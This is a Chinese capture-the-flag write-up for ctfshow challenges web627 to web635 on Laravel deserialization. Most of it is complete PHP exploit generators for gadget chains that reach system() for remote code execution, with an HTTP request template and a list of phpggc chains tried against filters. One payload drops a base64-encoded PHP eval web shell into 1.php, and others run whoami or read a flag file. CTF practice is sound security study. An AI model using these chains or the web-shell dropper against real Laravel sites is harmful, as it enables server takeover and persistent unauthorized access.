web627
Laravel 5.1 反序列化链
详细分析参考下篇文章。
Swift_KeyCache_DiskKeyCache->DefinedTargetClass->ValidGenerator
exp
<?php
namespace{
use Mockery\Generator\DefinedTargetClass;
class Swift_KeyCache_DiskKeyCache{
private $_keys=['fallingskies'=>array('fallingskies'=>'fallingskies')];
private $_path;
public function __construct($cmd){
$this->_path=new DefinedTargetClass($cmd);
}
}
echo urlencode((serialize(new Swift_KeyCache_DiskKeyCache("whoami"))));
}
namespace Mockery\Generator{
use Faker\ValidGenerator;
class DefinedTargetClass
{
private $rfc;
public function __construct($cmd)
{
$this->rfc=new ValidGenerator($cmd);
}
}
}
namespace Faker{
class DefaultGenerator{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
class ValidGenerator
{
protected $generator;
protected $validator;
protected $maxRetries;
public function __construct($cmd){
$this->generator=new DefaultGenerator($cmd);
$this->maxRetries=9;
$this->validator='system';
}
}
}
?>
发送payload时,还需要传一个_token参数。
以及添加一下Content-type头
POST /admin HTTP/1.1
Content-type: application/x-www-form-urlencoded
ctfshow=&_token=LiNQc6R2aiDl95vWsN0ko4SoI96UJ7YRDygskvCL
web628
u1s1,这个拦截为啥不写出来,找半天发现竟然写在函数里面的,无语😒
<?php
class DefinedTargetClass
{
private $rfc;
public function __construct(\ReflectionClass $rfc)
{
die("此链不通");
DefinedTargetClass这个函数被禁了,ValidGenerator函数也被禁了。
需要找一下新的__tostring和__call,详细分析参考下篇文章。
Swift_KeyCache_DiskKeyCache->Deprecated->DatabaseManager
<?php
namespace Illuminate\Database{
class DatabaseManager{
protected $app;
protected $extensions ;
public function __construct($payload)
{
$this->app['config']['database.default'] = $payload;
$this->app['config']['database.connections'] = [$payload => 'system'];
$this->extensions[$payload]='call_user_func';
}
}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Illuminate\Database\DatabaseManager;
class Deprecated
{
protected $description;
public function __construct($payload)
{
$this->description=new DatabaseManager($payload);
}
}
}
namespace {
use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
class Swift_KeyCache_DiskKeyCache {
private $_path;
private $_keys = ['fallingskies' => ['fallingskies' => 'fallingskies']];
public function __construct($payload) {
$this->_path = new Deprecated($payload);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache("echo 'PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg=='|base64 -d > 1.php")));
}
?>
web629
绕过,换另一条链
详细分析参考下篇文章。
Swift_KeyCache_DiskKeyCache->ObjectStateToken->Validator->DebugClassLoader
<?php
namespace{
use Prophecy\Argument\Token\ObjectStateToken;
class Swift_KeyCache_DiskKeyCache{
private $_keys=['fallingskies'=>['fallingskies'=>'fallingskies']];
private $_path;
public function __construct($cmd){
$this->_path=new ObjectStateToken($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache("cat /flags_c")));
}
namespace Prophecy\Argument\Token{
use Illuminate\Validation\Validator;
class ObjectStateToken{
private $name;
private $value;
private $util;
public function __construct($cmd){
$this->name='';
$this->value=$cmd;
$this->util=new Validator();
}
}
}
namespace Illuminate\Validation{
use Faker\DefaultGenerator;
class Validator{
protected $container;
protected $extensions = [];
public function __construct(){
$this->extensions['y']='xxx@loadClass';
$this->container=new DefaultGenerator();
}
}
}
namespace Faker{
use Symfony\Component\Debug\DebugClassLoader;
class DefaultGenerator
{
protected $default;
public function __construct()
{
$this->default = new DebugClassLoader();
}
}
}
namespace Symfony\Component\Debug{
class DebugClassLoader
{
private $classLoader;
public function __construct()
{
$this->classLoader = "system";
}
}
}
?>
web630
上题exp依然可以
web631
Laravel7.30 反序列化
使用phpgc中的RCE8就可以
web632
同上
web633
被过滤了,换条链
下面这些试了都被过滤了。
RCE2
PendingBroadcast
Dispatcher
RCE8
FileCookieJar
RequiredIf
LazyOption
RCE3
PendingBroadcast
ChannelManager
RCE4
PendingBroadcast
Validator
这个没过滤,但是命令执行没结果
RCE10
RequiredIf
RequestGuard
应该是过滤了PendingBroadcast和FileCookieJar
使用phpgc中的RCE16可以
RCE16
RotatingFileHandler
RequiredIf
RequestGuard
web634
同上
web635
同上